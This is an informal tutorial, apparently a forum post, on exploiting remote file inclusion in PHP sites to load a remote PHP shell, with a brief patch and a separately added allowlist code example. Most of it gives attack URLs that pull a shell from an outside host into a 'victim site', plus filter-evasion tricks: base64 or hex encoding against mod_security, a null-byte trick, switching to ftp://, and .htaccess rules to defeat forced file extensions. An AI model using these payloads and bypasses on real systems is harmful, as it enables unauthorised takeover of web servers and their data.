About remote file inclusion |RFI|
remote file inclusion is where you include a remote file..usually the file you include will be for malicious purposes
backdoors
what is a backdoor
well your house has a front door...that usually is supposed to be welcoming
a backdoor doesn't look welcoming because people aren't usually supposed to use it
a computer backdoor is a code/script that runs on a system with stealth
it allows hackers secret access to the affected system if it is set up correctly
a backdoor usually runs as a hidden process and will open various ports and accept commands from the hacker that is using it
shell
what is a shell
there are many forms of shells..we will not be talking about sea shells today though
a shell on a system is a session/terminal that takes commands etc..like a mini command center
shells can be in php, java, c and various other languages
today i will explain what a php shell is
a php shell is a script in php designed to take user inputted commands and browse files, execute commands, edit files, upload files, like a file manager
a php shell is executed via your web browser
eg...www.sites.com/shell.php?
the php shell gives you the same sort of access as if you were at that machine on the same account it is executed on..
remote file inclusion usually happens when someone makes a php script and doesn't code it so that the script sanitizes the user's input, and there are no restrictions running on the server hosting the website with the vulnerable page
a vulnerable page's source code may have this in it
this would mean that
"page" without the quotes is the variable
so you would type site.com/index.php?page=http://site.com/shell.txt?
note: it must be .txt in extension on the server, otherwise it will run on the other server where the remote file is located
also rfi won't work if url fopen or url include is disabled (the php.ini settings allow_url_fopen and allow_url_include) or if the page is patched
in order to patch their script in php they should replace
require($page . "faq.php");
with
require("faq.php");
and then the script can't take user input through the url
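the hard-coded require above only fits a script that serves one page. for a script that has to choose between several pages, an allowlist keeps the user input out of the path entirely. this is an added example, not code from the original post; the page names, the pages/ directory and the resolve_page helper are assumptions.

```php
<?php
// Added example: allowlist-based page include (hypothetical names throughout).
// Defence in depth: keep allow_url_include = Off in php.ini as well.

// The only values ?page= may take, mapped to local files (assumed names).
const PAGES = [
    'home' => 'home.php',
    'faq'  => 'faq.php',
    'news' => 'news.php',
];

/**
 * Resolve a user-supplied page key to a local file path, or null.
 * The input is only ever used as an array key, never as part of a path,
 * so http:// or ftp:// links, encoded links, null bytes and appended
 * extensions all fail the same way: they are not a key in PAGES.
 */
function resolve_page($input, string $baseDir): ?string
{
    // ?page[]=x arrives as an array; anything that is not a known key is rejected.
    if (!is_string($input) || !array_key_exists($input, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$input]);
    // realpath() returns false for missing files; also confirm the
    // resolved file really lives under the base directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$file = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
require $file;
```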
also if there is mod_security enabled try encoding the shell link in base64 or hex code
and for scripts that don't fully sanitise the user input but do check to a certain extent
use the nullbyte trick at the very end of the url
eg: site.com/index.php?page=http://site.com/shell.txt?
well if there is anything i missed, tell me
edit:
thought of 2 i forgot myself
some filters filter out http:// so try ftp:// instead
so instead of using the http protocol use the ftp protocol
also try converting the shell's link to binary
eg
site.com/index.php?page=binary string
---------updated
okies this is just a small update
sometimes a site may have in its code some security code to make it so that the file MUST have an extension of .html or something or .pdf
so if you attacked 127.0.0.1/index.php?page=document.pdf
and changed the document.pdf to your shell link 127.0.0.1/index.php?page=http://shell.com/shell.txt?
and got an error like this
warning: failed for inclusion http://site.com/shell.txt.pdf? blah blah blah
notice your input was shell.txt and it tried including a file called shell.txt.pdf
then you would go to your shell host and create a rule with a .htaccess file with the following code: AddType application/octet-stream pdf
you could also make it show the php file as a text file by using: AddType text/plain pdf
save this as a .htaccess file with 1 of the 2 codes above
anyways now let's get to the interesting part
now let's remember your php shell must end in a .pdf extension but show as a txt file
so rename your file shell.txt to shell.pdf
now go to your victim site and don't include the extension, let the php code do the work for ya;) teamwork is always useful
and use 127.0.0.1/index.php?page=http://shell.com/shell
because the script automatically adds the .pdf extension for you so you have 127.0.0.1/index.php?page=http://shell.com/shell.pdf
sweet!
anyways hope this is useful to some ppl